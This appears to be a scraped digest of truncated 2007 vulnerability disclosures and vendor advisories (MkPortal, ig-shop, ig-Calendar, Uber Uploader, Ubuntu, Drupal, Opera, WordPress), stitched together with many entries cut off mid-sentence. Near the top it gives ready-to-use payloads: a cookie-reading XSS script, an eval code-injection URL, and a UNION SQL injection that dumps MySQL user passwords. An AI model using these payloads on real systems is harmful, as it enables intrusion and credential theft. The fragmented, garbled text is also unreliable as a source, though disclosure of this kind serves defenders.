MkPortal Admin XSS
Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it
Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new
In both fields write:
<script>alert(document.cookie)</script>
and press save.
Alert
If eval is the answer, then you are asking the wrong question.
--Unknowen
ig-shop suffers from two evals that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");
SQL Injection in ig-Calendar. This works regardless of magic_quotes_gpc!
Dumps mysql login information:
http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,File_priv,0%20from%20mysql.user
./user.php line 52:
$query = 'SELECT * FROM users WHERE id='.$id;
Should
|
|Uber Uploader 4.2 Arbitrary File Upload Vulnerability
|Gamma Security Team
|www.nullak.com
|www.gammahack.com
|Discovered:Null
|Official Site:http://sourceforge.net/projects/uber-uploader
|Download
#
# ARIA-SECURITY TEAM#
# Forum: http://aria-security.com #
# Discovered by:Aria-Security Team #
#
#Type:Remote Password Disclosure
#!/usr/bin/php
<?php
/**
* This file requires the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
if($argc < 4)
{
print \n-;
The contact email address is security sap com. Security issues will then be
handled by our Security Response Team in direct communication with the reporter
of the issues.
Kind regards,
Fritz Bauspiess, SAP NetWeaver Product Management Security
===
Ubuntu Security Notice USN-401-1 January 04, 2007
dbus vulnerability
CVE-2006-6107
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
===
Ubuntu Security Notice USN-400-1 January 04, 2007
mozilla-thunderbird vulnerabilities
CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501,
CVE-2006-6502, CVE-2006-6503, CVE-2006-6505
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: WordPress Trackback Charset Decoding SQL Injection Vulnerability
Release Date: 2007/01/05
Last
Opera Software Opera Web Browser createSVGTransformFromMatrix Object
Typecasting Vulnerability
iDefense Security Advisory 01.05.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 05, 2007
I. BACKGROUND
Opera is a cross-platform web browser. More information is available at
Drupal security advisory DRUPAL-SA-2007-001
Project: Drupal core.
Date: 2007-Jan-05.
Drupal security advisory DRUPAL-SA-2007-002
Project: Drupal core.
Date: 2007-Jan-05.
-=[ADVISORY---]=-
FLog 1.1.2
Author: CorryL[EMAIL PROTECTED]
-=[---]=-
-=[+]
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr
# script name : Kolayindir Download (Yenionline) (tr)
# Script Download : http://www.aspindir.com/indir.asp?id=4630
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : down.asp
# Vulnerable : http://www.victim.com/ScriptPath/down.asp?id=[SqL]
===
Ubuntu Security Notice USN-402-1 January 05, 2007
avahi vulnerability
CVE-2006-6870
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: WordPress CSRF Protection XSS Vulnerability
Release Date: 2007/01/05
Last Modified: 2007/01/05
Script: EditTag
Version: 1.2
Author: Greg Billock ([EMAIL PROTECTED])
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)
I am sorry for my BAD English.
Description:
1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files
(ex.
ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow
http://www.zerodayinitiative.com/advisories/ZDI-07-001.html
January 5, 2007
-- CVE ID:
CVE-2006-6336
-- Affected Vendor:
QUALCOMM
-- Affected Products:
Eudora WorldMail 3.1.x Mail Management Server
-- TippingPoint(TM) IPS
Opera Software Opera Web Browser JPG Image DHT Marker Heap Corruption
Vulnerability
iDefense Security Advisory 01.05.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 05, 2007
I. BACKGROUND
Opera is a cross-platform web browser. More information is available at
http://www.opera.com/